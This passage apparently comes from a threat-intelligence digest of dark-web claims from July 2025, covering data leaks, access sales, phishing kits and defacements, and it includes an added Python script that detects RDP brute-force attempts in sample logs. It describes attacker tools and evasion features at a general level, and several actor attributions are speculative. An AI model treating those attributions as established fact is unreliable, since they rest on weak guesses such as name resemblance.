  • Category: Data Leak
  • Date: 2025-07-02T12:45:12Z
  • Victim: Germany GmbH Corporate Identity (Germany)
  • Threat Actor: jojocarabinieri
  • Incident Description: The threat actor “jojocarabinieri” claims to be selling a complete corporate identity package for a Germany GmbH (limited liability company). This highly sensitive data includes notarized documents such as company registration, articles of association, shareholder details, and bank statements. Furthermore, the listing features “CEO fullz,” which includes the CEO’s ID (front and back) and a selfie holding the ID. This type of leak is critically valuable for sophisticated corporate fraud, business email compromise (BEC) schemes, impersonation, and other financial crimes, potentially enabling attackers to take over corporate accounts or establish fraudulent entities.
  • Threat Actor Profile: jojocarabinieri
  • No specific information about “jojocarabinieri” is available in the provided research material. This suggests that “jojocarabinieri” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of such high-value corporate and personal identity data clearly indicates that the primary motivation is financial gain. The comprehensive nature of the leaked information suggests it would command a premium price on underground markets due to its utility in various high-impact financial frauds.
  • TTPs: Acquiring such a comprehensive and verified corporate identity package, especially including notarized documents and CEO “fullz,” likely requires a deep and persistent breach of a corporate network, a legal firm, an accounting firm, or a government registry. It could involve highly targeted social engineering, insider threat collaboration, or the exploitation of critical vulnerabilities in systems handling sensitive corporate records.
  • Source Links:

15. Alleged sale of Market data

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T12:00:22Z
  • Victim: Multiple top global cryptocurrency exchanges (Binance, Coinbase, Kraken, Bitfinex, etc.)
  • Threat Actor: Khprince
  • Incident Description: The threat actor “Khprince” claims to have leaked a large dataset containing aggregated market data from multiple top global cryptocurrency exchanges, including major players like Binance, Coinbase, Kraken, and Bitfinex. While aggregated market data might seem less sensitive than personally identifiable information (PII), it can be highly valuable for illicit trading strategies, market manipulation, front-running, or identifying patterns that could lead to further exploitation of these platforms or their users.
  • Threat Actor Profile: Khprince
  • No specific information about “Khprince” is available in the provided research material. This suggests that “Khprince” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of this data indicates that the primary motivation is financial gain. This gain could come directly from the sale of the dataset or indirectly by leveraging the data for illicit trading activities or arbitrage opportunities in the cryptocurrency markets.
  • TTPs: Acquiring aggregated market data from multiple, distinct cryptocurrency exchanges suggests either a sophisticated attack on a common data aggregator service that collects information from these exchanges, or a series of individual compromises of various exchanges followed by the aggregation of the exfiltrated data. This would require significant technical capability to bypass the security measures of multiple high-profile financial platforms.
  • Source Links:

16. Alleged Sale of Compromised Crypto Meme Twitter API

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T11:54:51Z
  • Victim: Crypto meme page Twitter account (Social Media)
  • Threat Actor: MrDark
  • Incident Description: The threat actor “MrDark” claims to be selling access to the API of a compromised Twitter account belonging to a crypto meme page with over 17.3K followers. The API access reportedly includes elevated permissions such as post.read, users.read, and bookmark.write. The sale purportedly includes not only the access but also the underlying vulnerability that enabled the breach. This type of access could be highly valuable for conducting cryptocurrency scams, spreading disinformation, launching sophisticated social engineering campaigns, or promoting fraudulent schemes to a large, engaged audience.
  • Threat Actor Profile: MrDark
  • No specific information about “MrDark” is available in the provided research material. This suggests that “MrDark” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of the compromised API access and the underlying vulnerability clearly indicates that the primary motivation is financial gain. The targeting of a crypto-related account suggests a specific interest in leveraging the compromised access for cryptocurrency fraud, market manipulation, or other financially motivated illicit activities within the crypto space.
  • TTPs: The sale of “the underlying vulnerability” implies that the actor has either discovered a new zero-day exploit or acquired an N-day exploit for Twitter’s API or related services. This indicates a higher level of technical capability than typical credential stuffing attacks. Exploiting API vulnerabilities can provide direct, programmatic control over platform functionalities, enabling large-scale automated malicious actions without requiring direct user interaction.
  • Source Links:

17. Alleged Sale of Spoofed Zoom Meeting Toolkit

  • Incident Overview:
  • Category: Malware
  • Date: 2025-07-02T11:42:37Z
  • Victim: General users/organizations vulnerable to social engineering via spoofed meetings
  • Threat Actor: Darky1337
  • Incident Description: The threat actor “Darky1337” claims to be selling a spoofed Zoom meeting toolkit designed to simulate realistic Zoom sessions. The tool offers features such as the ability to create meetings with 1 to 5 simulated participants, customize avatars and pre-recorded videos, and replicate Zoom’s official grid layout. It also supports adding custom functions upon request and includes an admin dashboard and a Zoom-like application interface, demonstrated through screenshots. This toolkit is a highly sophisticated social engineering tool, designed to create extremely convincing phishing lures, likely for credential theft, malware delivery, or business email compromise (BEC) scams.
  • Threat Actor Profile: Darky1337
  • No specific information about “Darky1337” is available in the provided research material. This suggests that “Darky1337” is either a new or less publicly documented individual threat actor specializing in the development and sale of social engineering tools.
  • Motivations: The primary motivation is financial gain through the sale of this advanced toolkit. By providing such a realistic and customizable tool, “Darky1337” enables other cybercriminals to conduct more effective and deceptive social engineering campaigns, thereby profiting from the broader cybercrime ecosystem.
  • TTPs: This actor specializes in developing sophisticated social engineering tools that leverage popular communication platforms like Zoom. The features described (simulated participants, custom avatars, pre-recorded videos, realistic layout, custom functions) indicate a deep understanding of user behavior and platform mechanics, designed to bypass human skepticism and traditional security awareness training. This tool significantly enhances the realism and effectiveness of phishing campaigns, making it harder for victims to detect and mitigate.
  • Source Links:

18. Alleged data breach of Nirmal Haloi College

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T11:32:15Z
  • Victim: Nirmal Haloi College (Education, India)
  • Threat Actor: GARUDA ERROR SYSTEM
  • Incident Description: The “GARUDA ERROR SYSTEM” group claims to have leaked the database of Nirmal Haloi College, an educational institution in India. The compromised data includes academic records such as attendance logs, subject lists, and verification files, provided in CSV format. The exposure of academic records can lead to identity theft, academic fraud, or serve as a basis for highly targeted phishing attacks against students and faculty.
  • Threat Actor Profile: GARUDA ERROR SYSTEM (Likely Hacktivist of Garuda)
  • “GARUDA ERROR SYSTEM” is highly likely an alias or closely affiliated with the Indonesian hacktivist group “Hacktivist of Garuda”.17
  • History & Profile: “Hacktivist of Garuda” is an Indonesian hacktivist group that established a Telegram channel specifically to announce cyberattacks targeting Indian entities.17 They have explicitly stated that their attacks are a counterattack in retaliation for perceived attacks by Indian hackers (e.g., “Indian Cyber Mafia”) on Indian private sites.17 The group previously claimed to have stolen data from Indian railways.17
  • Motivations: The primary motivation for “GARUDA ERROR SYSTEM” is hacktivism and retaliation within an ongoing cyber conflict between Indonesian and Indian hacktivist groups.17 The targeting of Indian educational institutions, such as Nirmal Haloi College, aligns with their declared intent to attack “Indian infrastructure” as part of their “OpIndia2.0” campaign.17
  • Key TTPs: Their activities predominantly include data theft and defacement of websites.17 The consistent targeting of Indian educational institutions for data breaches, as seen in this and subsequent incidents, demonstrates a focused campaign to disrupt and exfiltrate information from specific sectors in India.
  • Source Links:

19. Alleged data breach of Himalaya Public Senior Secondary School

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T11:19:19Z
  • Victim: Himalaya Public Senior Secondary School (Education, India)
  • Threat Actor: GARUDA ERROR SYSTEM
  • Incident Description: Consistent with their observed pattern, the “GARUDA ERROR SYSTEM” group claims to have leaked data from Himalaya Public Senior Secondary School, another educational institution in India. This further solidifies their ongoing targeted campaign against the Indian education sector. The nature of the leaked data, while not explicitly detailed for this specific incident, is likely similar to academic records, posing risks of privacy compromise and potential misuse.
  • Threat Actor Profile: GARUDA ERROR SYSTEM (Likely Hacktivist of Garuda)
  • The profile, motivations, and TTPs for “GARUDA ERROR SYSTEM” are consistent with those detailed in Incident 18. This group is likely an alias or closely affiliated with the Indonesian hacktivist group “Hacktivist of Garuda,” primarily driven by hacktivism and retaliation against Indian entities.17 Their repeated targeting of Indian educational institutions underscores a focused effort within their cyber conflict.
  • Source Links:

20. Alleged data breach of Budding Brains International School (BBIS)

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T11:17:10Z
  • Victim: Budding Brains International School (BBIS) (Education, India)
  • Threat Actor: GARUDA ERROR SYSTEM
  • Incident Description: This marks the third consecutive incident where “GARUDA ERROR SYSTEM” claims a data breach of an Indian educational institution, specifically Budding Brains International School (BBIS). This persistent targeting strongly confirms a deliberate and focused campaign by the group against India’s education sector, likely as part of their broader hacktivist agenda. The repeated nature of these attacks suggests either a common vulnerability exploited across these institutions or a sustained effort to compromise multiple targets within the sector.
  • Threat Actor Profile: GARUDA ERROR SYSTEM (Likely Hacktivist of Garuda)
  • The profile, motivations, and TTPs for “GARUDA ERROR SYSTEM” remain consistent with those detailed in Incident 18. Their continued targeting of Indian educational institutions, as seen in this and the preceding incidents, reinforces their role as an Indonesian hacktivist group engaged in retaliatory cyberattacks against India.17
  • Source Links:

21. Alleged Sale of Advanced Evilginx3 Variant

  • Incident Overview:
  • Category: Malware
  • Date: 2025-07-02T11:15:41Z
  • Victim: General users/organizations vulnerable to advanced phishing
  • Threat Actor: maverickslab
  • Incident Description: The threat actor “maverickslab” claims to be selling an advanced version of Evilginx3, a well-known phishing framework, customized to bypass Cloudflare and BotGuard protections. The toolkit boasts features such as DOM-tampering, fingerprint mitigation, Google BotGuard evasion, fully automated proxy rotation, and the creation of high-conversion phishing lure pages, where each visitor sees a unique proxy and phishing portal. The package includes a pre-configured Evilginx3 setup, a rotation engine, support, and free updates for 30 days. This tool represents a significant advancement in phishing capabilities, making it substantially harder for both users and automated security systems to detect and mitigate sophisticated phishing attacks.
  • Threat Actor Profile: maverickslab
  • No specific information about “maverickslab” is available in the provided research material. This suggests that “maverickslab” is either a new or less publicly documented individual threat actor specializing in the development and sale of sophisticated phishing tools.
  • Motivations: The primary motivation is financial gain through the sale of this advanced phishing toolkit to other cybercriminals. By offering a tool that bypasses common security defenses and enhances the realism of phishing lures, “maverickslab” enables a wider range of malicious actors to conduct more successful and evasive credential harvesting and social engineering campaigns.
  • TTPs: This actor focuses on developing and distributing tools that directly counter modern security defenses, such as Web Application Firewalls (WAFs) and bot detection mechanisms (e.g., Cloudflare, BotGuard, Google BotGuard). The technical features like DOM-tampering, fingerprint mitigation, and automated proxy rotation indicate a deep understanding of anti-phishing technologies and network obfuscation. The emphasis on “high-conversion phishing lure pages” highlights a focus on maximizing the success rate of credential theft, which is a critical initial access vector for many subsequent attacks.
  • Source Links:

22. Alleged sale of unauthorized access to a WordPress-based online store from Ireland

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T11:14:05Z
  • Victim: Unidentified WordPress-based online store (E-commerce & Online Stores, Ireland)
  • Threat Actor: Yudgin
  • Incident Description: The threat actor “Yudgin” claims to be selling unauthorized admin access to an Irish WordPress-based online store. The listing specifies that the site features Stripe iframe payment integration and has 1,085 registered users with an average transaction value of 87 Euros. Gaining admin access to an e-commerce platform can lead to various malicious activities, including data theft (customer PII and payment information), payment redirection (diverting funds from legitimate transactions), website defacement, or the injection of malicious code for supply chain attacks.
  • Threat Actor Profile: Yudgin
  • No specific information about “Yudgin” is available in the provided research material. This suggests that “Yudgin” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of compromised e-commerce access clearly indicates that the primary motivation is financial gain. The detailed mention of registered users and average transaction value suggests the actor is marketing the access based on its potential for direct financial exploitation.
  • TTPs: Gaining admin access to a WordPress-based site typically involves exploiting common WordPress vulnerabilities (e.g., outdated plugins/themes, known CVEs), brute-forcing weak admin credentials, or leveraging misconfigurations. The presence of Stripe iframe payment integration means that while direct payment processing might be handled externally, the admin access could still allow for manipulation of order details, customer information, or redirection logic.
  • Source Links:

23. Alleged data breach of Operation PAR, Inc.

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T10:46:55Z
  • Victim: Operation PAR, Inc. (Non-profit & Social Organizations, USA)
  • Threat Actor: Worldleaks
  • Incident Description: The “Worldleaks” group claims to have breached Operation PAR, Inc., a non-profit and social organization in the USA, and exfiltrated a significant volume of data: 485.2 GB, including 898,100 files. The sheer size of the compromised data suggests a comprehensive compromise of internal documents, client records, and operational files. For a non-profit, this could include sensitive client information, donor data, and internal operational strategies, posing risks to privacy, reputation, and continued service delivery.
  • Threat Actor Profile: Worldleaks
  • “Worldleaks” is a new extortion platform that emerged in early 2025, specifically launched on January 1, 2025, by the operators of the Hunters International ransomware group.18
  • History & Profile: This platform represents a strategic shift from a double extortion model (which involved ransomware deployment) to an extortion-only approach. This shift was reportedly driven by increased risks and reduced profitability within the traditional ransomware ecosystem.18 Despite this strategic pivot, the parent group, Hunters International, remains active and has continued to claim victims, with over 70 reported since the shift was announced.18 Worldleaks functions as an Extortion-as-a-Service (EaaS) platform, providing affiliates with an exfiltration tool to facilitate their operations.18 They are also known to collaborate with other ransomware groups, such as Secp0.18
  • Motivations: The primary motivation for “Worldleaks” is financial gain through extortion, leveraging the exfiltrated data as leverage against victims.18 The large volume of data exfiltrated from Operation PAR, Inc. is consistent with their EaaS model, which aims to maximize extortion potential by demonstrating significant compromise.
  • Key TTPs:
  • Data Exfiltration: Worldleaks provides its affiliates with specialized tools designed for efficient data exfiltration.18
  • Extortion Operations: They operate multiple platforms to facilitate their extortion activities: a main data leak site (referred to as a “trophy wall” where victims’ data is displayed), a negotiation site for ransom payments, and an “Insider platform” designed for journalists to publicize breaches and increase pressure on victims.18 They employ selective exposure of sensitive files to escalate psychological pressure on the victim organization.18
  • Hybrid Approach: While Worldleaks claims to be an extortion-only project, investigations have confirmed that some of its claimed victims have still experienced ransomware deployment on their systems. This indicates a flexible or collaborative approach where ransomware may still be utilized, perhaps through their affiliates.18
  • Infrastructure: The Worldleaks platform shares numerous similarities in design, layout, and functionality with the Hunters International platform, suggesting the use of shared underlying frameworks and operational infrastructure.18
  • Source Links:

24. Alleged data breach of TVheadend

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T10:44:50Z
  • Victim: TVheadend TV streaming server (Entertainment & Movie Production, Iran)
  • Threat Actor: Sword of Ali
  • Incident Description: The threat actor “Sword of Ali” claims to have breached the TVheadend TV streaming server and, notably, completely deleted its database. This is a destructive attack, going beyond mere data theft to cause significant operational disruption and data loss. The targeting of an Iranian entity, coupled with the destructive nature of the attack, suggests motivations beyond simple financial gain, possibly related to hacktivism, geopolitical objectives, or internal disruption.
  • Threat Actor Profile: Sword of Ali (Potential Iran-aligned group)
  • While “Sword of Ali” is not directly named in the provided research, the targeting of an Iranian entity and the name itself (evoking “Ali Baba” and a reference to “The Sword of Ali Baba” in a Wikipedia snippet 19) suggest a potential link to Iran-aligned hacking groups. The profile of BladedFeline (an Iran-aligned group, assessed as a sub-cluster within OilRig, a known Iranian nation-state cyber actor) is highly relevant here.20 OilRig is linked to Iran’s Ministry of Intelligence and Security (MOIS).21
  • History & Profile (BladedFeline/OilRig context): BladedFeline has been active since September 2017, primarily targeting government officials and telecommunication providers in the Kurdistan Region of Iraq (KRG), Iraq, and Uzbekistan.20 They were first documented by ESET in May 2024 and have been observed orchestrating attacks against Iran’s neighbors.20
  • Motivations: If “Sword of Ali” is indeed an Iran-aligned group, the motivation for targeting an Iranian entity like TVheadend could be complex:
  • False Flag Operation: To mislead attribution and divert attention from the true perpetrators or their state sponsors.
  • Internal Disruption or Control: To disrupt services or gain control for internal political reasons, perhaps to silence dissent or demonstrate authority.
  • Demonstration of Capability: To showcase their destructive capabilities to a specific audience or to other threat actors.
  • Hacktivism: If the actor is a non-state entity, the motivation could be ideological, aiming to make a statement against the target or its associated entities.
  • Cyber Espionage: BladedFeline’s motivations include cyber espionage, maintaining strategic access, gathering diplomatic and financial information, and countering Western influence.20 A destructive attack could be a cover for deeper intelligence gathering or a punitive measure.
  • Key TTPs (BladedFeline/OilRig context): These groups are known for malware development, creating custom backdoors like Shahmaran, Whisper (Veaty), Spearal, Optimizer, Slippery Snakelet, and Hawking Listener.20 They utilize various tunneling tools such as Laret and Pinar to maintain access.20 They also employ malicious IIS modules like PrimeCache, which bears similarities to OilRig’s RDAT backdoor.20 Initial access often involves suspected exploitation of internet-facing application vulnerabilities and social engineering efforts.20 The complete deletion of a database indicates a destructive capability consistent with advanced threat actors.
  • Source Links:

25. LulzSec Resitance targets the website of Sai Computer School Patna

  • Incident Overview:
  • Category: Defacement
  • Date: 2025-07-02T10:30:14Z
  • Victim: Sai Computer School Patna (Education, India)
  • Threat Actor: LulzSec Resitance
  • Incident Description: The “LulzSec Resitance” group claims to have defaced the website of Sai Computer School Patna, an educational institution in India. Website defacement is a hallmark tactic of hacktivist groups, used to publicly broadcast their presence, convey a message, or simply demonstrate their ability to compromise targets.
  • Threat Actor Profile: LulzSec Resitance (LulzSec Offshoot)
  • “LulzSec Resitance” is clearly an offshoot or a group heavily inspired by the original LulzSec group.4 The original LulzSec (May-June 2011) was a grey hat hacking group affiliated with Anonymous and AntiSec, known for high-profile attacks and sarcastic post-attack messages.4
  • Motivations: Similar to the original LulzSec, the motivation for “LulzSec Resitance” is likely a combination of “lulz” (causing mayhem for entertainment), exposing insecure systems, and potentially political messaging.5 The targeting of an Indian educational institution could be part of a broader hacktivist campaign, potentially related to the ongoing cyber conflict between Indonesian and Indian hacktivist groups, as observed with “GARUDA ERROR SYSTEM.” This suggests a coordinated or ideologically aligned effort to impact Indian digital infrastructure.
  • Key TTPs: Defacement is a core tactic of LulzSec and its various affiliates.4 Their historical methods also included Denial of Service attacks, data theft, and hijacking accounts, which could be precursors or follow-ups to defacement activities.
  • Source Links:

26. Alleged sale of access to Tunisian Post Office Server

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T10:28:56Z
  • Victim: The Tunisian Post Office (Financial Services, Tunisia)
  • Threat Actor: mecrobyte
  • Incident Description: The threat actor “mecrobyte” claims to be selling root access to a server belonging to the Tunisian Post Office, a financial services entity in Tunisia. Root access grants the highest level of control over a server, enabling an attacker to modify system configurations, install malware, exfiltrate any data stored on the server, or use it as a pivot point for further attacks within the organization’s network. This is a critical compromise for a financial institution, with potential implications for customer data, financial transactions, and operational integrity.
  • Threat Actor Profile: mecrobyte
  • No specific information about “mecrobyte” is available in the provided research material. This suggests that “mecrobyte” is either a new or less publicly documented individual threat actor, or an alias that has not been explicitly associated with known groups in the provided intelligence.
  • Motivations: The explicit “sale” of root access clearly indicates that the primary motivation is financial gain. The targeting of a financial services institution like the Tunisian Post Office suggests an interest in high-value targets that can yield significant profit through the sale of access or subsequent data exfiltration. “mecrobyte” was also observed selling admin access to OwlCom, reinforcing this focus on monetizing compromised access.
  • TTPs: Obtaining root access to a server typically requires exploiting severe vulnerabilities in network services, operating systems, or applications running on the server. It could also involve successful social engineering to acquire administrative credentials, or the exploitation of misconfigured systems. The ability to gain root access implies a high level of technical proficiency in penetration testing or vulnerability exploitation.
  • Source Links:

27. Alleged data sale of Bank of India

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T10:21:42Z
  • Victim: Bank of India (Banking & Mortgage, India)
  • Threat Actor: Market Exchange
  • Incident Description: A threat actor, identified as “Market Exchange,” claims to have leaked data from Bank of India salary accounts, exposing over 850,000 valid cardholder records. The data, reportedly extracted on June 30, 2025, includes updated salary account information such as first and last names, mobile numbers, email addresses, and account types. This constitutes a significant data breach for a major financial institution, posing severe risks of financial fraud, identity theft, and targeted phishing campaigns against a large number of individuals.
  • Threat Actor Profile: Market Exchange
  • “Market Exchange” is likely a reference to a darknet marketplace or an actor operating within such a market, rather than a specific hacking group.22 Darknet markets are commercial websites on the dark web that facilitate the sale of illicit goods, including stolen data.22
  • Motivations: The explicit “sale” of data from a bank clearly indicates that the primary motivation is financial gain. The value of stolen financial data, especially cardholder records and salary account information, is high on underground markets.
  • Key TTPs (Darknet Market Context): While “Market Exchange” itself is likely a platform or vendor, the underlying breach would have involved specific TTPs to compromise the Bank of India. Darknet markets operate via anonymized access (typically Tor), use cryptocurrencies (Bitcoin, Monero) with escrow services, and feature vendor feedback systems.22 The sale of stolen data on these platforms involves a process where buyers transfer cryptocurrency into escrow, and vendors dispatch goods (data) before payment is released.22 The incident highlights how such markets enable the monetization of large-scale data breaches.
  • Source Links:

28. Alleged leak of Pegasus Spyware

  • Incident Overview:
  • Category: Malware
  • Date: 2025-07-02T10:16:32Z
  • Threat Actor: APT IRGC
  • Incident Description: The threat actor “APT IRGC” claims to have leaked details on Pegasus spyware, showcasing how zero-click vulnerabilities were exploited to infiltrate devices without user interaction. The actor asserts that the tool enabled full remote control over target phones by leveraging advanced in-memory exploitation techniques to bypass user defenses and gain persistent access. If true, this leak could provide critical intelligence on sophisticated state-sponsored surveillance capabilities, potentially enabling other actors to develop similar tools or defenses.
  • Threat Actor Profile: APT IRGC (Iranian State-Sponsored Cyber Groups)
  • “APT IRGC” directly refers to an Advanced Persistent Threat (APT) group associated with Iran’s Islamic Revolutionary Guard Corps (IRGC).21 The IRGC is one of the most powerful and feared organizations in Iran, playing central roles in the country’s projection of power, internal security, and economy, reporting directly to the Supreme Leader.24 The IRGC operates Iran’s ballistic missile arsenal and oversees the Quds Force, an expeditionary arm that partners with Iran’s various regional affiliates.24 They also have a cyber command that works with IRGC-affiliated businesses on military and commercial espionage, as well as propaganda distribution.24
  • History & Profile: Iranian state-sponsored hacking groups linked to the IRGC have a long history of orchestrating social engineering attacks using elaborate lures, often approaching targets on platforms like Facebook and LinkedIn with fictitious personas to deploy malware.25 Notable groups include Magic Hound (APT35, Charming Kitten, Cobalt Illusion), APT33 (Elfin, Magnallium), OilRig (APT34, Helix Kitten, Chrysene), and APT42.21
  • Motivations: Iranian APT groups, particularly those linked to the IRGC, are primarily motivated by cyber espionage, intelligence gathering, and political objectives.21 They target journalists, researchers, human rights activists, government officials, and those critical of the Iranian regime.21 The alleged leak of Pegasus spyware details could be motivated by:
  • Disinformation/Propaganda: To spread specific narratives or sow distrust.
  • Demonstration of Capability: To showcase their ability to acquire highly sensitive intelligence on advanced surveillance tools.
  • Intelligence Sharing/Sales: While less common for state-sponsored groups to openly “leak” such tools, it could be a controlled release to specific allies or for a highly valuable sale on a private market.
  • Key TTPs: These groups are known for aggressive spear-phishing campaigns, rapid setup of domains and infrastructure, and fast-paced takedowns when identified.25 They exploit software vulnerabilities and use cloud platforms for command-and-control infrastructure.21 Their attacks often leverage geopolitical tensions to coax victims into deploying malware.25 The alleged leak of Pegasus details implies a successful compromise of a highly sensitive target with access to such information, potentially through sophisticated zero-day exploits or supply chain attacks.
  • Source Links:

29. Alleged leak of access credentials to Highway Police Division Thailand

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T09:52:34Z
  • Victim: Highway Police Division Thailand (Government Administration, Thailand)
  • Threat Actor: H3C4KEDZ
  • Incident Description: The “H3C4KEDZ” group claims to have gained unauthorized access to the Highway Police Division Thailand. Gaining initial access to a government administration entity, especially law enforcement, is a critical compromise. It could enable further data exfiltration (e.g., sensitive operational data, personal information of officers or citizens), system disruption, or the planting of backdoors for long-term espionage.
  • Threat Actor Profile: H3C4KEDZ (Hellcat Hacking Group)
  • H3C4KEDZ is associated with the Hellcat Hacking Group, which emerged in late 2024.3 The group is led by Rey and Pryx, known for high-profile attacks on major corporations.3
  • Motivations: Hellcat’s motivations are a mix of notoriety, financial gain, and hacktivism.3 Rey, identifying as a “Palestinian hacker,” and Pryx, known for offensive statements, use their activities to publicize their presence and potentially make political statements.3 Targeting a government entity like the Highway Police aligns with hacktivist motivations to disrupt or expose state operations, or to demonstrate capability for future financial exploitation.
  • Key TTPs: Rey’s operations frequently involve exploiting Jira credentials for access.3 Pryx developed a “unique server-side stealer” using Tor for data exfiltration.3 They are involved in data breaches and leaks, and sell malware.3 Their aggressive online presence on Telegram and X (Twitter) is used to share leaks and publicize operations.3 Gaining initial access to a government network suggests sophisticated techniques, potentially involving social engineering or exploiting network perimeter vulnerabilities.
  • Source Links:

30. Alleged sale of RDP access to an unidentified Retail Company from USA

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T09:44:31Z
  • Victim: Unidentified U.S.-based retail organization (Retail Industry, USA)
  • Threat Actor: BenjaminFranklin
  • Incident Description: The threat actor “BenjaminFranklin” claims to be selling Remote Desktop Protocol (RDP) access to a U.S.-based retail organization. The listing advertises domain admin privileges and notes that the target is protected by Trend Micro Security Agent. RDP access with domain admin privileges provides complete control over the organization’s IT infrastructure, making it highly valuable for ransomware deployment, extensive data theft, or long-term espionage. The mention of Trend Micro suggests the attacker has found a way to bypass or disable endpoint security.
  • Threat Actor Profile: BenjaminFranklin
  • No specific information about “BenjaminFranklin” is available in the provided research material. This suggests that “BenjaminFranklin” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of RDP access with domain admin privileges clearly indicates that the primary motivation is financial gain. Access of this caliber is highly sought after on underground forums for various illicit activities, including ransomware operations.
  • TTPs: Obtaining RDP access with domain admin privileges typically involves exploiting vulnerabilities in remote access services, brute-forcing weak RDP credentials, or compromising administrative accounts through phishing or malware. The ability to bypass or operate undetected by an endpoint security solution like Trend Micro Security Agent implies a degree of sophistication in their methods, such as using living-off-the-land binaries or custom tools to evade detection.
  • Source Links:
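The brute-force path mentioned under TTPs leaves a recognizable trace in Windows Security logs: a burst of Event ID 4625 failures from one source against one account, followed by an Event ID 4624 success with Logon Type 10 (RemoteInteractive, i.e. RDP). The following is an added example, not code from the report or from any of the parties it describes; the event records, account names, IP addresses and thresholds are constructed for illustration.

```python
"""Added example (not part of the report): detecting the RDP brute-force
pattern described under TTPs, run over constructed Windows Security events.

Heuristic: per (account, source IP), count Event ID 4625 logon failures in a
sliding window; raise a medium alert when the count reaches the threshold and
a high alert when an Event ID 4624 success with Logon Type 10
(RemoteInteractive, i.e. RDP) follows the burst. The records below are
constructed sample data, not telemetry from the incident."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5             # failures per (account, IP) that constitute a burst
WINDOW = timedelta(minutes=5)  # sliding window for counting failures
RDP_LOGON_TYPE = 10            # RemoteInteractive logon (RDP session)

# Constructed sample events in the flattened shape a SIEM export might use.
# Note: with Network Level Authentication enabled, failed RDP attempts are
# usually logged as 4625 with Logon Type 3, so failures are NOT filtered by
# logon type here; only the success is required to be type 10.
SAMPLE_EVENTS = [
    {"ts": "2025-07-02T09:40:01Z", "id": 4625, "user": "svc_backup", "ip": "203.0.113.7"},
    {"ts": "2025-07-02T09:40:07Z", "id": 4625, "user": "svc_backup", "ip": "203.0.113.7"},
    {"ts": "2025-07-02T09:40:09Z", "id": 4625, "user": "alice", "ip": "198.51.100.20"},
    {"ts": "2025-07-02T09:40:13Z", "id": 4625, "user": "svc_backup", "ip": "203.0.113.7"},
    {"ts": "2025-07-02T09:40:19Z", "id": 4625, "user": "svc_backup", "ip": "203.0.113.7"},
    {"ts": "2025-07-02T09:40:22Z", "id": 4624, "user": "alice", "ip": "198.51.100.20", "logon_type": 10},
    {"ts": "2025-07-02T09:40:25Z", "id": 4625, "user": "svc_backup", "ip": "203.0.113.7"},
    {"ts": "2025-07-02T09:40:31Z", "id": 4625, "user": "svc_backup", "ip": "203.0.113.7"},
    {"ts": "2025-07-02T09:41:00Z", "id": 4624, "user": "svc_backup", "ip": "203.0.113.7", "logon_type": 10},
    {"ts": "2025-07-02T09:50:00Z", "id": 4625, "user": "svc_backup", "ip": "203.0.113.7"},
]


def parse_ts(value):
    """Parse the ISO-8601 UTC timestamps used in the sample records."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_rdp_bruteforce(events, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return alert dicts for failure bursts and for bursts followed by an RDP success."""
    recent_failures = defaultdict(deque)  # (account, ip) -> timestamps of 4625s in window
    alerts = []
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        key = (ev["user"].lower(), ev["ip"])
        ts = parse_ts(ev["ts"])
        window_q = recent_failures[key]
        # Expire failures that fell out of the sliding window.
        while window_q and ts - window_q[0] > window:
            window_q.popleft()
        if ev["id"] == 4625:
            window_q.append(ts)
            if len(window_q) == threshold:  # fire once when the burst threshold is crossed
                alerts.append({"severity": "medium", "type": "rdp_bruteforce",
                               "user": key[0], "ip": key[1],
                               "failures": len(window_q), "ts": ev["ts"]})
        elif ev["id"] == 4624 and ev.get("logon_type") == RDP_LOGON_TYPE:
            if len(window_q) >= threshold:
                # A success right after a burst is the strongest signal: the
                # account is likely compromised and should be reviewed immediately.
                alerts.append({"severity": "high", "type": "rdp_bruteforce_success",
                               "user": key[0], "ip": key[1],
                               "failures": len(window_q), "ts": ev["ts"]})
            window_q.clear()  # a success ends the current burst either way


    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

A domain-admin account appearing in a `rdp_bruteforce_success` alert is the scenario the listing above describes and warrants containment (disable the account, isolate the host) rather than just ticketing.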

31. Alleged data leak of ISID (Innovative Software for Image and Data)

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T09:24:28Z
  • Victim: ISID (Innovative Software for Image and Data) (Software Development, Spain)
  • Threat Actor: CLOBELSECTEAM
  • Incident Description: The threat actor “CLOBELSECTEAM” claims to have leaked 77GB of data from the database of ISID (Innovative Software for Image and Data), a software development company in Spain. The large volume of data suggests a significant compromise, potentially including intellectual property, customer data, and internal operational information. For a software development firm, such a breach could expose source code, proprietary algorithms, or sensitive project details, leading to competitive disadvantage or supply chain risks.
  • Threat Actor Profile: CLOBELSECTEAM
  • While “CLOBELSECTEAM” is not directly detailed, its name and the nature of the attack (a data leak) suggest a group focused on data exfiltration. The provided snippets for this query mention Lapsus$.26 Lapsus$ is an international extortion-focused black-hat hacker group active since late 2021, known for various cyberattacks against companies and government agencies, with members arrested in Brazil and the UK in 2022.26
  • Motivations (Lapsus$ context): Lapsus$’s primary goal is often fame and notoriety rather than direct financial gain, though they do engage in extortion.28 They are known for being disarmingly bold, directly soliciting employees on Telegram for login credentials.28 If “CLOBELSECTEAM” shares similar motivations, the leak could be for notoriety or to pressure the victim into an extortion payment.
